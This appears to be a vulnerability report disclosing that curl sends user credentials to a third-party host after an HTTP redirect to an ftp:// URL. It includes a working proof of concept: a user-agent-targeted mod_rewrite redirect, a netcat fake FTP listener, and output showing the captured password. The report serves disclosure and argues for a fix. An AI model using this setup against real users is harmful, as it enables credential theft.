Curl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.
firstsite.tld
to perform redirect with mod_rewrite:
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
secondsite.tld
for example with:while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
curl -L --user foo https://firstsite.tld/redirectpoc
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
There are several issues here:
firstsite.tld
vs secondsite.tld
). This is definitely not what the user could expect, considering the documentation says:I believe the credentials should not be sent in this case unless if --location-trusted
is used.
It might even be sensible to consider making curl stop sending credentials over downgraded security by default even when --location-trusted
is used. Maybe there could be some option that could be used to enable such downgrade if the user REALLY wants it.
Leak of confidential information (user credentials).